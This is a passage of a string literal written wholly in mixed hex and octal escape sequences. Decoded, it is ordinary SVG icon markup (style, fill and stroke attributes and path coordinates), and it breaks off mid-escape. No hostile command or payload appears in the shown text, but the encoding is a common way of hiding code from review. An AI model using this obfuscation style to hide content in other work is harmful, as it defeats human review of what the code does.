40\40\x20\40\40\x20\x20\x20\x20\x20\x73\x74\171\x6c\145\75\42\40\x66\x69\x6c\x6c\72\x23\60\60\60\60\60\x30\73\x22\x3e\x3c\147\40\146\151\x6c\154\75\x22\156\157\x6e\145\42\x20\146\151\154\x6c\x2d\162\x75\x6c\145\75\x22\156\x6f\x6e\x7a\x65\x72\x6f\42\x20\x73\164\x72\x6f\153\145\75\x22\156\157\x6e\x65\42\x20\x73\164\162\157\153\145\55\167\x69\144\x74\x68\x3d\x22\x31\42\x20\163\164\162\157\153\145\x2d\154\151\x6e\x65\143\x61\x70\x3d\x22\x62\165\164\x74\42\x20\163\164\162\157\x6b\145\55\x6c\x69\x6e\145\152\157\151\x6e\75\x22\155\x69\x74\x65\162\x22\x20\x73\164\162\157\153\145\x2d\x6d\x69\164\145\x72\x6c\x69\155\151\164\x3d\42\x31\x30\x22\x20\163\x74\x72\x6f\x6b\x65\55\x64\x61\x73\x68\x61\162\x72\x61\x79\75\x22\42\40\163\164\x72\157\x6b\145\55\144\141\163\x68\157\146\x66\163\x65\x74\75\42\x30\x22\40\x66\157\156\164\x2d\146\141\x6d\151\x6c\x79\75\42\x6e\x6f\x6e\145\42\x20\146\157\x6e\164\55\x77\x65\x69\x67\150\164\x3d\x22\156\x6f\x6e\145\42\40\146\x6f\156\x74\x2d\x73\x69\x7a\x65\75\42\156\x6f\156\145\x22\x20\164\145\170\x74\55\141\x6e\x63\150\157\x72\x3d\x22\x6e\157\x6e\145\x22\40\163\x74\x79\154\x65\x3d\42\x6d\151\x78\x2d\x62\x6c\x65\x6e\144\x2d\x6d\x6f\x64\x65\x3a\x20\156\x6f\x72\x6d\x61\154\42\76\74\160\141\x74\150\40\x64\x3d\42\115\60\x2c\x31\67\x32\x76\x2d\61\67\x32\150\x31\x37\x32\x76\61\x37\62\172\42\x20\x66\151\x6c\x6c\75\42\156\157\156\x65\x22\x3e\x3c\x2f\x70\x61\164\x68\76\x3c\147\x20\146\x69\154\154\x3d\42\x23\x66\146\x66\146\146\x66\x22\x3e\x3c\x70\x61\164\x68\x20\x64\x3d\42\115\70\66\54\60\143\x2d\x38\x2e\x38\62\x38\x34\64\54\60\x20\55\x31\66\x2e\x31\x32\65\x2c\x37\x2e\62\71\66\x35\x36\x20\55\61\66\x2e\61\x32\65\x2c\61\x36\x2e\61\x32\65\x63\x30\x2c\x31\56\71\x38\x38\67\65\x20\x30\x2e\65\x31\60\x36\x33\54\63\x2e\x36\x35\x35\40\x30\x2e\x39\x36\67\65\x2c\x35\x2e\61\x36\143\60\x2e\62\62\70\x34\64\54\x30\56\x37\x35\62\x35\40\x30\56\x34\x38\63\x37\x35\x2c\61\56\x34\65\61\62\65\x20\x30\x2e\66\x34\x35\54\x31\x2e\x39\63\x35\143\x30\56\x30\62\66\x38\x38\54\60\x2e\x31\60\x37\65\40\x30\x2e\60\x38\x30\x36\x33\54\x30\56\61\x33\x34\63\x38\x20\60\56\61\x30\67\65\x2c\60\56\x32\61\65\143\60\x2e\60\x31\63\x34\x34\x2c\60\x2e\60\65\63\x37\65\40\x30\x2c\x30\x2e\x33\x30\71\x30\x36\x20\x30\54\60\x2e\63\x32\62\x35\x63\x30\56\x30\x38\x30\x36\x33\x2c\x30\56\x32\x36\x38\67\x35\40\60\56\x31\70\70\61\x33\x2c\x30\56\x35\x31\60\66\x33\40\60\x2e\x33\62\x32\x35\x2c\60\56\67\65\62\65\143\64\56\60\x34\x34\x36\71\54\x38\x2e\64\62\x35\x33\61\40\65\56\x36\67\x30\x36\63\54\61\64\56\60\x32\x38\67\x35\x20\x35\x2e\71\x31\x32\65\54\61\x37\56\62\143\x30\54\60\56\60\x34\x30\63\x31\x20\60\54\x30\56\60\66\x37\61\x39\x20\x30\54\x30\x2e\61\x30\x37\x35\x63\x2d\x36\56\64\60\x39\66\x39\x2c\61\x2e\62\x37\x36\x35\66\40\55\x31\62\56\x32\65\x35\54\x33\56\x38\62\71\x36\x39\x20\x2d\61\67\56\x33\x30\x37\x35\x2c\x37\x2e\x33\x31\143\x2d\60\x2e\63\64\x39\63\x37\x2c\x2d\60\56\63\64\71\63\67\x20\x2d\60\56\66\x33\61\65\66\54\x2d\60\56\67\63\x39\x30\66\x20\x2d\x30\56\x39\66\67\65\x2c\55\x31\56\x31\70\x32\65\143\x2d\61\56\70\66\67\x38\61\54\x2d\62\56\x34\x37\x32\x35\x20\x2d\x32\x2e\x38\x36\62\61\x39\54\x2d\66\x2e\64\65\40\x2d\62\x2e\x35\70\x2c\55\x37\x2e\66\63\x32\x35\143\60\56\x30\66\x37\61\71\54\x2d\60\56\x32\x34\x31\70\x37\x20\x30\56\x30\71\x34\60\66\x2c\55\60\x2e\64\71\x37\x31\x39\x20\60\56\x31\x30\67\65\x2c\55\x30\56\67\x35\x32\65\166\x2d\x30\x2e\66\x34\65\x63\x30\x2e\62\71\x35\66\63\54\x2d\x31\56\61\60\61\70\67\40\x30\x2e\x37\65\62\x35\x2c\55\62\x2e\x32\x33\60\x36\x32\40\x30\56\67\x35\62\65\54\x2d\x33\x2e\x38\67\x63\x30\x2c\55\70\x2e\x38\62\x38\64\64\40\55\x37\56\x34\x30\64\60\66\x2c\x2d\61\x36\x2e\61\x32\65\x20\x2d\x31\66\56\62\x33\x32\65\54\x2d\61\x36\x2e\x31\x32\65\x63\x2d\x38\x2e\x38\x32\70\x34\x34\54\x30\40\x2d\x31\x36\56\61\62\x35\x2c\x37\x2e\62\71\x36\65\x36\40\55\x31\66\x2e\x31\x32\65\54\x31\66\x2e\x31\x32\x35\x63\60\54\66\x2e\70\65\x33\61\63\x20\x34\56\63\x32\66\70\70\54\61\63\56\60\x30\x37\65\x20\61\x30\x2e\x37\65\54\x31\65\x2e\62\x36\65\143\60\x2e\60\x38\60\66\63\x2c\x30\x2e\60\x32\x36\70\70\x20\x30\x2e\61\63\64\63\70\54\x30\x2e\60\70\x30\x36\63\40\x30\56\62\61\65\54\x30\56\61\x30\x37\x35\143\x33\x2e\x30\71\60\x36\x33\54\x31\x2e\x33\61\x36\x38\70\40\x37\56\x33\x32\x33\64\64\54\x34\x2e\62\65\71\66\x39\40\x31\60\x2e\62\x31\62\x35\x2c\x37\x2e\64\61\x37\x35\143\60\56\71\65\64\x30\x36\54\x31\56\x30\x33\x34\66\x39\40\61\x2e\66\x36\x36\x32\65\54\x32\x2e\61\x32\x33\x31\63\x20\62\56\62\65\x37\x35\54\63\x2e\61\x31\67\65\143\55\64\x2e\x37\x39\67\61\x39\54\x37\56\x31\x33\x35\63\61\40\x2d\67\56\66\63\x32\65\x2c\x31\x35\x2e\70\x30\62\65\40\x2d\67\x2e\66\63\62\65\54\62\65\56\60\x34\67\65\x63\60\x2c\63\x2e\x30\x33\x36\70\70\x20\x30\x2e\x34\60\63\61\x33\54\x35\x2e\71\x35\x32\x38\61\x20\x30\56\67\65\x32\x35\x2c\70\x2e\x37\60\67\65\143\60\56\60\x31\63\x34\64\54\x30\56\62\61\65\40\60\x2e\x30\65\63\x37\x35\x2c\x30\x2e\64\63\40\x30\x2e\61\60\67\65\54\60\x2e\x36\64\x35\143\60\x2c\x30\x2e\x30\62\66\70\x38\x20\60\x2c\60\56\x30\70\x30\66\x33\40\60\54\60\56\61\60\67\x35\x63\x30\54\x30\56\x30\66\67\x31\x39\40\60\x2c\x30\56\x31\x34\67\70\61\40\60\x2c\x30\x2e\x32\x31\65\x63\55\60\56\x31\x32\60\71\x34\54\60\x2e\x36\71\x38\67\65\x20\x2d\x30\56\x36\64\65\54\x30\56\x39\64\60\66\63\40\x2d\61\56\65\x30\65\54\61\56\x33\x39\67\x35\143\x2d\61\56\x32\x36\x33\61\62\54\60\56\66\x37\x31\x38\70\x20\55\x33\56\x34\x36\66\x38\67\54\x30\x2e\x35\62\64\60\x36\40\x2d\x33\x2e\64\64\x2c\60\x2e\65\63\x37\65\x6c\x2d\x30\x2e\61\x30\67\65\x2c\60\56\61\x30\x37\x35\x63\x2d\x32\56\x33\67\x38\64\64\x2c\x2d\x31\56\x34\65\61\x32\x35\40\x2d\65\x2e\x30\71\62\70\x31\x2c\x2d\x32\56\64\67\x32\65\x20\x2d\70\56\x31\67\x2c\x2d\x32\x2e\64\x37\62\65\143\55\x38\56\x38\62\x38\64\64\54\60\40\x2d\61\x36\x2e\62\63\x32\x35\54\67\56\64\x30\64\x30\x36\40\55\x31\x36\56\x32\63\62\x35\x2c\x31\x36\x2e\62\x33\62\65\143\x30\x2c\70\56\70\62\70\64\64\x20\67\x2e\x34\60\x34\x30\66\54\61\x36\x2e\61\62\x35\40\x31\x36\x2e\62\63\62\x35\x2c\61\66\x2e\x31\x32\x35\x63\x35\x2e\62\70\x30\x39\x34\54\x30\x20\71\x2e\71\70\x34\x30\x36\54\x2d\x32\x2e\x35\x36\x36\65\66\40\x31\63\x2e\x30\x30\67\x35\54\x2d\x36\x2e\64\x35\x63\x30\x2e\60\64\x30\63\61\x2c\55\x30\56\x30\x34\x30\x33\61\40\60\56\x30\x36\67\61\x39\x2c\x2d\60\56\60\66\x37\61\71\x20\60\56\x31\60\67\65\54\55\60\56\x31\x30\x37\65\143\x31\x2e\67\64\x36\x38\x38\x2c\x2d\62\56\x34\x37\62\x35\40\x34\x2e\x31\65\x32\x31\x39\x2c\x2d\x34\x2e\x34\70\70\x31\62\40\66\x2e\61\62\67\65\x2c\55\65\x2e\62\66\67\65\143\61\56\71\x37\65\x33\61\x2c\x2d\x30\x2e\67\x37\x39\63\67\40\63\x2e\x30\x36\63\67\x35\x2c\55\60\56\x37\61\x32\61\71\x20\x34\56\65\61\x35\x2c\x30\56\x36\x34\x35\143\x30\x2e\63\63\65\x39\x34\54\x30\56\63\x32\62\65\x20\60\56\67\x33\71\x30\x36\54\x30\56\65\x39\x31\62\x35\x20\x31\56\x31\70\62\x35\x2c\x30\56\x37\x35\62\x35\x63\x37\x2e\61\x30\x38\64\64\x2c\x37\x2e\x30\x32\67\70\61\40\61\x36\x2e\x35\x35\x35\x2c\61\x31\x2e\x39\64\65\x39\x34\40\x32\x36\56\71\70\62\x35\54\61\63\x2e\62\62\x32\65\143\60\56\62\64\x31\x38\x38\54\61\x2e\x35\60\x35\40\x30\56\x33\66\62\x38\61\x2c\62\x2e\x39\65\x36\x32\65\40\60\x2e\62\61\x35\x2c\64\x2e\x33\x63\55\x30\x2e\x33\x38\71\x36\x39\54\63\56\x36\x31\64\66\x39\40\x2d\62\x2e\61\x36\x33\64\64\54\66\x2e\65\x31\67\61\71\40\x2d\63\56\x33\x33\62\65\54\67\56\x34\61\x37\x35\x63\x2d\64\x2e\x36\x30\x39\60\x36\54\62\56\67\x32\67\70\61\40\x2d\x37\x2e\x38\64\x37\65\x2c\67\56\x38\x33\64\60\66\40\55\67\x2e\70\x34\67\65\x2c\x31\x33\x2e\67\x36\143\x30\54\70\x2e\70\x32\70\64\x34\40\x37\56\x32\71\66\65\66\x2c\61\x36\56\x31\x32\65\x20\61\66\x2e\x31\x32\x35\x2c\61\x36\x2e\61\62\65\x63\x38\x2e\70\x32\x38\x34\x34\x2c\60\x20\x31\66\56\61\x32\65\x2c\x2d\67\x2e\62\71\66\65\66\x20\61\x36\56\x31\62\65\54\x2d\61\x36\x2e\61\62\65\143\60\54\55\x36\x2e\x35\x38\x34\x33\x37\40\55\61\x2e\x39\60\70\x31\62\54\x2d\61\x34\x2e\x36\60\66\65\x36\40\55\x33\56\x32\x32\65\x2c\x2d\x32\x31\x2e\65\x63\x2d\60\x2e\63\x34\71\x33\x37\x2c\55\x31\56\70\66\67\x38\x31\x20\55\x30\56\66\64\65\x2c\x2d\63\x2e\x36\65\x35\40\55\60\56\70\66\54\55\x35\x2e\62\66\67\x35\143\61\61\x2e\61\x32\66\62\65\54\55\63\56\x32\65\x31\70\x37\x20\x32\x30\x2e\x34\x37\70\67\x35\x2c\x2d\x31\x30\56\x34\64\x30\x39\x34\x20\62\x36\56\x34\64\65\54\55\x32\60\x2e\x32\61\143\61\x2e\x36\65\x32\70\61\54\x30\x2e\x37\62\x35\x36\63\x20\x33\x2e\64\x35\63\x34\x34\54\62\x2e\60\x30\62\x31\x39\40\x35\x2e\x30\65\62\65\54\63\x2e\x35\x34\67\65\x63\63\56\61\x39\70\x31\x33\x2c\x33\x2e\60\67\x37\x31\71\x20\x35\x2e\x34\x38\x32\x35\x2c\x36\x2e\66\66\x35\40\65\56\x34\x38\62\65\x2c\66\56\66\x36\65\x63\x30\56\63\66\62\x38\61\x2c\60\x2e\65\66\x34\x33\70\x20\x30\56\70\x38\66\x38\x38\54\x31\56\x30\x32\x31\x32\65\x20\61\x2e\x35\x30\65\54\x31\x2e\x32\71\x63\x30\56\61\x30\67\65\54\x30\x2e\x30\x38\x30\66\x33\x20\x30\56\x32\x31\x35\x2c\60\x2e\61\64\67\x38\61\x20\x30\56\x33\x32\x32\x35\x2c\60\56\x32\x31\x35\143\62\56\x38\x34\x38\67\x35\x2c\64\x2e\x31\62\x35\x33\61\40\x37\56\x31\64\70\x37\x35\x2c\67\56\x33\61\x20\x31\62\56\67\x39\62\x35\54\x37\56\63\61\x63\70\x2e\x38\62\70\x34\64\x2c\60\40\61\x36\56\61\62\65\54\55\x37\56\x32\x39\x36\65\x36\40\x31\x36\56\x31\62\x35\x2c\55\x31\66\56\61\62\x35\x63\x30\x2c\x2d\x38\56\70\62\x38\64\64\40\x2d\67\56\62\71\66\x35\66\x2c\x2d\61\x36\56\x31\x32\65\40\x2d\61\66\56\x31\x32\x35\54\55\x31\x36\x2e\61\62\x35\x63\55\x32\56\70\63\x35\x33\61\x2c\60\40\x2d\x35\56\x36\x35\x37\x31\71\54\x30\x2e\x38\x34\66\x35\66\x20\x2d\x38\x2e\61\x37\54\x32\x2e\63\x36\x35\154\55\x30\x2e\x31\x30\67\65\x2c\55\60\x2e\x31\60\67\x35\143\x2d\62\56\71\64\x32\70\x31\x2c\x31\56\62\x37\x36\x35\x36\x20\55\65\x2e\x32\61\x33\67\x35\x2c\60\56\70\x37\x33\64\64\x20\x2d\67\x2e\x39\65\x35\54\55\60\x2e\64\63\143\x2d\x31\x2e\61\x39\x35\71\64\x2c\x2d\60\56\x35\66\64\63\x37\40\x2d\x32\56\64\63\62\61\71\x2c\55\61\x2e\63\x33\60\63\61\40\55\63\56\66\x35\65\54\55\x32\56\x31\x35\x63\60\56\x36\71\x38\x37\65\54\55\x33\56\x30\71\60\x36\x32\x20\60\x2e\71\66\67\65\x2c\55\x36\x2e\x31\x32\67\x35\x20\60\x2e\71\66\x37\x35\x2c\55\71\x2e\x33\65\x32\65\166\x2d\x31\x2e\x32\x39\x63\60\x2e\60\x34\x30\63\x31\x2c\x2d\60\56\61\60\67\65\x20\60\56\x30\x38\60\66\x33\54\x2d\x30\56\x32\x31\x35\40\x30\x2e\61\60\67\x35\54\55\60\x2e\63\x32\x32\x35\143\60\56\x31\62\60\71\x34\54\55\60\56\61\64\67\x38\x31\40\x30\56\x34\61\x36\65\x36\x2c\55\60\x2e\65\65\60\x39\x34\40\60\x2e\x39\x36\x37\x35\54\x2d\60\56\x38\66\x63\61\x2e\60\70\70\x34\64\54\x2d\60\56\x36\x33\x31\x35\x36\40\x32\x2e\70\x37\x35\66\63\54\x2d\x31\x2e\63\x33\60\63\x31\x20\64\x2e\x38\x33\x37\65\54\x2d\61\56\71\x33\x35\143\x33\x2e\x39\x33\x37\x31\71\x2c\55\61\56\x32\x30\71\x33\67\x20\x38\56\x38\x36\70\67\65\x2c\55\61\x2e\x38\x39\x34\x36\71\x20\61\62\56\x36\x38\65\54\55\x31\x2e\61\70\62\x35\166\x2d\60\56\61\60\67\x35\x63\61\56\61\62\x38\x37\65\x2c\x30\56\63\x34\x39\x33\x38\40\x32\x2e\63\61\x31\62\x35\54\x30\56\65\x33\67\x35\x20\63\x2e\61\61\67\65\x2c\60\x2e\x35\x33\x37\65\143\x37\x2e\60\60\60\71\x34\x2c\x30\40\61\x33\56\60\x30\67\x35\54\55\65\x2e\x37\x35\x31\x32\x35\x20\61\63\56\x30\x30\x37\65\x2c\55\61\x33\56\61\x31\65\143\x30\x2c\55\67\x2e\x33\x36\x33\x37\x35\x20\55\x36\x2e\63\x35\x35\71\x34\x2c\x2d\x31\x32\x2e\x36\x38\x35\x20\x2d\61\63\x2e\64\x33\x37\x35\54\55\x31\x32\x2e\x36\70\65\143\55\64\x2e\x38\x31\x30\x36\62\54\60\40\x2d\70\x2e\71\x32\x32\x35\54\62\56\67\65\64\x36\x39\40\55\61\x30\56\x39\x36\x35\x2c\66\56\67\x37\x32\65\x6c\55\x30\x2e\x31\x30\67\65\54\55\x30\x2e\x31\60\67\65\143\x2d\61\x2e\62\66\x33\x31\62\x2c\x31\x2e\x37\70\67\61\x39\x20\55\64\56\x39\x30\x34\x36\71\x2c\63\56\71\62\x33\67\x35\40\55\x38\x2e\63\x38\65\x2c\x34\x2e\65\x31\65\x63\x2d\x31\x2e\x37\x34\x36\x38\x37\x2c\x30\x2e\62\71\x35\66\x33\x20\55\63\x2e\x33\71\71\66\x39\54\60\56\62\65\65\63\61\40\x2d\x34\x2e\66\62\x32\x35\54\x2d\x30\x2e\x31\60\x37\x35\143\55\x31\56\x32\x32\62\70\x31\54\x2d\x30\x2e\63\x36\x32\70\x31\x20\x2d\x31\56\x39\x32\61\65\x36\54\55\x30\x2e\x39\60\x30\63\61\x20\x2d\62\56\64\67\62\65\54\55\x31\x2e\x38\x32\67\65\143\55\x30\x2e\62\x35\x35\x33\61\x2c\55\60\56\x33\x38\x39\x36\x39\40\x2d\x30\x2e\65\x37\67\x38\61\x2c\x2d\60\56\x37\61\62\61\71\x20\55\x30\x2e\x39\x36\67\65\54\x2d\60\x2e\71\66\67\65\143\55\x30\x2e\x30\66\67\61\71\54\55\x30\56\60\70\60\66\62\40\55\60\56\x31\63\x34\63\67\x2c\x2d\60\x2e\61\64\67\x38\61\x20\55\x30\56\x32\x31\x35\x2c\55\60\x2e\62\61\65\143\x2d\65\x2e\65\x30\71\63\x37\54\55\71\56\x31\66\64\63\x37\x20\x2d\61\x34\x2e\61\x33\x36\x32\x35\54\x2d\61\66\x2e\x33\x34\x20\55\x32\64\x2e\65\x31\x2c\55\61\x39\56\66\67\x32\x35\x63\55\x30\x2e\61\x33\64\x33\x37\54\55\x30\x2e\x30\x38\60\66\62\x20\55\60\56\x32\70\62\61\71\x2c\x2d\x30\x2e\61\64\67\70\61\x20\x2d\60\56\x34\63\x2c\55\x30\56\x32\x31\x35\x63\55\x30\x2e\61\x30\x37\x35\54\55\x30\56\x30\64\60\x33\61\x20\x2d\x30\56\62\x31\65\54\x2d\x30\56\60\70\x30\66\62\x20\55\x30\x2e\x33\62\x32\65\x2c\55\60\56\61\60\x37\x35\143\55\64\x2e\64\60\x37\65\x2c\x2d\x31\56\71\60\70\61\x32\x20\55\x34\x2e\x38\x36\64\63\67\x2c\55\64\56\62\x37\x33\61\62\x20\55\64\56\67\63\54\x2d\x37\56\63\61\143\x30\56\x31\x33\64\x33\70\x2c\55\x33\x2e\60\x37\x37\x31\71\40\x31\56\x38\x31\64\60\x36\54\x2d\x36\x2e\x36\x31\x31\62\x35\40\x32\56\x34\67\62\x35\x2c\x2d\x37\56\x36\63\62\x35\x63\x30\56\x30\61\63\64\x34\x2c\55\60\x2e\60\61\63\x34\x34\40\x2d\x30\56\x30\61\63\64\x34\x2c\x2d\x30\56\x30\71\64\x30\x36\x20\x30\54\55\60\x2e\61\60\67\65\x63\62\x2e\x32\61\67\61\x39\x2c\55\x33\x2e\61\65\x37\x38\61\x20\65\x2e\x33\67\65\x2c\55\x36\x2e\x35\x30\x33\67\x35\x20\65\56\x33\x37\x35\54\55\61\61\x2e\71\x33\62\x35\x63\x30\54\55\x38\56\x38\62\x38\64\64\x20\x2d\67\x2e\x32\x39\x36\65\66\x2c\x2d\61\66\56\61\62\x35\40\x2d\61\66\x2e\61\x32\65\x2c\x2d\61\66\x2e\x31\62\x35\172\x4d\70\66\54\66\56\70\70\143\x34\56\x39\x33\x31\65\x36\x2c\x30\x20\x39\56\x32\64\65\54\x34\x2e\63\x31\x33\64\x34\40\x39\56\x32\x34\65\54\71\56\x32\64\65\x63\x30\x2c\62\56\67\x39\x35\x20\55\x31\56\65\71\x39\x30\x36\x2c\64\56\63\65\63\x37\65\x20\55\64\56\x31\71\62\65\54\70\x2e\x30\x36\62\65\143\x2d\x31\56\x34\x32\64\x33\x37\x2c\62\x2e\61\x33\x36\x35\x36\40\55\63\56\64\x34\x2c\66\x2e\62\63\x35\x20\55\63\x2e\66\65\65\54\61\61\x2e\62\70\x37\x35\x63\55\60\x2e\x32\60\61\65\x36\54\x34\x2e\x37\63\40\x32\56\61\65\54\x31\60\x2e\x34\66\x37\70\61\x20\70\56\x31\x37\x2c\61\63\x2e\x35\64\65\x63\60\56\x31\60\x37\x35\x2c\x30\x2e\x30\70\60\66\x33\x20\60\56\62\x31\x35\x2c\60\56\61\x34\67\70\x31\40\x30\x2e\x33\x32\62\x35\54\60\56\62\x31\65\143\x30\56\61\x37\x34\x36\71\54\x30\56\61\62\60\71\x34\40\60\56\x33\x34\71\63\70\x2c\x30\56\62\x32\70\64\x34\40\60\x2e\x35\x33\x37\x35\54\x30\56\63\62\x32\x35\143\60\x2e\61\x30\67\65\x2c\60\x2e\x30\x35\x33\67\x35\40\60\x2e\x32\61\65\54\x30\x2e\x30\66\x37\61\71\40\60\x2e\63\x32\62\x35\54\x30\56\x31\60\67\65\x63\x30\56\62\x30\x31\x35\66\x2c\60\x2e\60\x39\64\x30\66\x20\x30\56\x34\x33\54\60\56\61\x36\x31\x32\65\x20\60\56\66\x34\x35\54\60\56\62\x31\65\143\71\56\x32\x37\61\70\x38\54\62\x2e\x38\67\x35\x36\63\40\x31\67\56\x30\x32\65\63\x31\x2c\x39\56\x34\61\71\66\71\x20\62\x31\x2e\x37\61\x35\x2c\61\67\56\70\x34\x35\143\x30\56\x33\62\62\x35\x2c\x30\x2e\65\71\x31\x32\65\40\60\56\70\x30\66\62\x35\54\61\x2e\x30\67\65\40\x31\56\63\x39\x37\x35\54\61\x2e\63\x39\x37\65\143\x31\56\x34\x37\x38\61\x33\54\x31\56\67\66\x30\63\61\x20\63\56\64\x32\66\65\x36\x2c\x32\x2e\71\x34\x32\70\61\x20\x35\x2e\x34\70\x32\x35\54\63\x2e\x35\64\67\65\143\62\56\65\x32\x36\62\x35\x2c\x30\x2e\x37\x35\x32\x35\40\x35\56\61\70\66\70\70\x2c\x30\56\x37\x35\x32\65\x20\x37\x2e\x37\64\x2c\x30\56\63\62\x32\x35\x63\x35\x2e\x31\61\x39\x36\x39\54\55\60\56\70\67\x33\x34\x34\x20\61\x30\56\x30\63\67\x38\x31\54\x2d\63\x2e\x33\65\x39\x33\x37\x20\61\62\x2e\x39\54\x2d\x37\x2e\x34\x31\67\65\143\x30\x2e\x31\62\60\x39\64\x2c\x2d\60\x2e\x31\x37\64\66\71\x20\60\56\62\x32\70\x34\x34\x2c\x2d\x30\56\x33\64\x39\63\x37\x20\60\x2e\x33\62\x32\x35\54\55\x30\56\x35\63\67\65\x63\60\56\70\x33\63\61\x33\x2c\x2d\61\56\x38\x36\67\x38\x31\x20\62\x2e\65\x31\62\70\61\54\55\63\56\x31\x31\67\65\x20\65\56\x30\x35\62\x35\x2c\55\x33\x2e\61\61\x37\x35\143\63\x2e\x39\62\x33\67\x35\54\60\40\66\56\65\x35\x37\x35\54\62\56\61\x36\63\x34\x34\40\66\x2e\x35\65\x37\x35\54\65\56\x38\x30\65\x63\x30\x2c\x33\56\x36\64\x31\x35\x36\x20\x2d\62\x2e\70\60\x38\64\x34\x2c\x36\x2e\62\x33\x35\x20\x2d\66\x2e\61\62\x37\65\x2c\66\x2e\62\63\x35\x63\55\61\56\x30\63\64\x36\x39\x2c\60\40\x2d\60\x2e\71\71\64\x33\67\x2c\x2d\x30\56\x30\x36\x37\61\x39\x20\55\60\x2e\x38\x36\x2c\60\x63\x2d\60\x2e\x33\60\x39\60\66\54\x2d\60\x2e\61\x36\x31\62\x35\40\55\x30\x2e\x36\63\x31\x35\66\x2c\x2d\x30\56\x32\66\70\67\x35\x20\x2d\x30\x2e\x39\66\67\65\x2c\x2d\60\56\x33\x32\x32\x35\x63\55\x35\56\x34\70\62\65\x2c\55\x31\56\60\60\67\x38\x31\40\x2d\61\x31\56\x32\x36\60\x36\x32\x2c\x2d\x30\x2e\x30\66\x37\61\x39\x20\x2d\61\x36\x2e\x30\61\x37\x35\54\61\x2e\x33\x39\x37\x35\143\x2d\62\x2e\63\67\70\x34\64\54\60\56\67\x32\65\66\x33\x20\55\64\x2e\x35\x31\x35\54\x31\56\65\70\x35\x36\x33\40\x2d\x36\x2e\x32\x33\x35\54\62\x2e\x35\70\x63\55\x31\x2e\x35\65\70\67\x35\x2c\x30\x2e\x39\x30\60\x33\61\x20\55\63\56\60\67\x37\x31\71\x2c\61\x2e\x35\65\70\x37\x35\40\x2d\x33\x2e\x38\67\x2c\x33\56\x37\66\x32\x35\143\x2d\x30\56\64\67\60\63\x31\54\60\x2e\66\x35\70\x34\x34\x20\x2d\x30\56\66\x39\70\x37\65\54\x31\x2e\x34\x35\x31\62\65\40\55\60\x2e\66\x34\x35\x2c\x32\56\x32\x35\x37\x35\x76\62\x2e\x33\x36\x35\x63\60\54\x31\56\x39\64\70\64\64\40\55\60\56\60\x39\x34\60\x36\x2c\x33\x2e\x37\x36\62\x35\x20\55\60\x2e\x33\x32\62\65\x2c\x35\x2e\x34\70\62\65\143\55\x30\x2e\x32\x35\65\63\61\54\55\60\56\x30\62\x36\70\x37\40\55\60\56\64\71\x37\61\x39\x2c\x2d\x30\56\x30\x32\x36\70\x37\x20\55\x30\x2e\x37\65\62\65\x2c\x30\x63\55\60\x2e\x31\60\x37\65\x2c\x30\x20\55\x30\56\x32\x31\x35\x2c\60\40\55\60\x2e\x33\x32\x32\65\54\x30\x63\55\x31\x2e\x34\62\x34\63\x37\54\60\x2e\62\64\x31\x38\70\x20\55\62\56\65\63\x39\x36\71\x2c\61\x2e\63\x34\x33\x37\65\x20\x2d\x32\x2e\67\x39\65\x2c\x32\x2e\x37\x35\64\x36\71\x63\x2d\x30\x2e\62\x36\x38\67\65\x2c\x31\56\x34\x32\64\63\x38\x20\60\56\63\67\66\x32\x35\54\62\56\70\x34\x38\x37\x35\x20\x31\56\x36\61\x32\65\54\63\56\x35\x38\x37\x38\61\x63\x30\x2e\64\70\63\67\65\x2c\x30\56\x33\62\x32\x35\x20\x31\56\61\x36\x39\60\66\54\60\56\x37\x39\62\x38\61\x20\61\x2e\x37\62\x2c\61\56\61\70\62\x35\143\60\x2e\64\x30\x33\x31\63\54\60\56\x35\65\60\x39\x34\40\x30\x2e\x39\66\67\65\x2c\x30\56\71\65\x34\60\66\x20\61\x2e\x36\x31\62\65\x2c\61\x2e\61\x38\x32\x35\x63\x31\x2e\67\x34\66\x38\x38\54\x31\x2e\62\x33\x36\62\x35\x20\x33\56\66\66\x38\x34\64\x2c\x32\x2e\64\70\65\x39\x34\x20\x35\56\x39\61\62\65\54\x33\x2e\x35\64\67\x35\x63\x33\56\x38\60\62\x38\61\x2c\61\x2e\70\60\60\66\x33\40\70\x2e\x36\x38\60\x36\x33\54\62\56\x37\60\60\71\64\40\61\x33\x2e\x36\65\62\65\x2c\x30\x2e\65\63\x37\65\143\60\x2e\x31\70\x38\61\63\54\x2d\60\x2e\60\x39\64\60\x36\x20\60\56\x33\x36\62\70\x31\x2c\x2d\60\56\x32\x30\x31\x35\66\x20\x30\x2e\65\63\67\65\x2c\55\x30\56\x33\x32\x32\x35\143\61\x2e\x34\x37\x38\61\x33\54\x2d\60\x2e\71\70\60\71\64\40\63\x2e\61\x39\x38\61\x33\x2c\55\61\x2e\63\x39\67\65\x20\x34\56\x39\64\x35\54\x2d\61\56\63\71\67\65\143\64\x2e\x39\x33\61\65\x36\x2c\60\40\71\56\62\x34\x35\x2c\64\56\x33\x31\x33\x34\x34\40\71\56\62\x34\65\x2c\x39\56\62\x34\65\143\60\54\64\x2e\71\x33\61\x35\x36\x20\55\64\x2e\x33\61\x33\64\64\x2c\x39\x2e\62\x34\x35\40\x2d\71\x2e\x32\64\65\x2c\71\x2e\62\64\65\143\x2d\63\x2e\x37\x38\71\63\67\x2c\60\x20\55\x36\56\67\63\62\61\71\54\x2d\x32\x2e\61\66\63\64\64\40\x2d\x38\56\62\67\67\65\54\55\65\x2e\62\66\x37\65\143\55\x30\x2e\x33\63\x35\71\64\54\x2d\x30\56\66\64\65\x20\55\60\56\70\x36\54\x2d\61\x2e\x31\x36\x39\x30\66\x20\x2d\61\56\65\60\65\54\55\x31\56\x35\60\65\x63\x2d\60\56\66\x33\x31\65\x36\x2c\x2d\60\x2e\x39\x36\x37\65\x20\x2d\x32\56\61\x33\x36\65\66\x2c\55\x33\56\x35\64\67\x35\x20\55\x35\56\x34\x38\x32\x35\54\x2d\66\56\67\67\62\65\143\x2d\x31\56\x39\x37\x35\63\61\x2c\55\x31\x2e\x38\71\64\66\x39\x20\55\x34\56\x33\62\66\x38\x37\54\x2d\63\x2e\67\63\x35\66\x32\40\55\x37\x2e\60\x39\x35\x2c\55\64\56\x39\x34\x35\143\55\60\56\71\65\64\x30\66\54\55\60\56\x34\x31\x36\65\66\40\55\61\x2e\71\64\x38\x34\x34\x2c\55\x30\x2e\x37\65\62\x35\40\55\63\56\60\61\54\55\60\x2e\x39\66\x37\65\143\x2d\x30\56\64\70\63\x37\65\54\x2d\x30\56\61\70\70\61\62\x20\x2d\x30\x2e\x39\71\64\x33\67\54\55\x30\x2e\62\x35\65\x33\x31\40\x2d\x31\56\x35\60\x35\54\55\60\56\62\61\x35\x63\x2d\61\x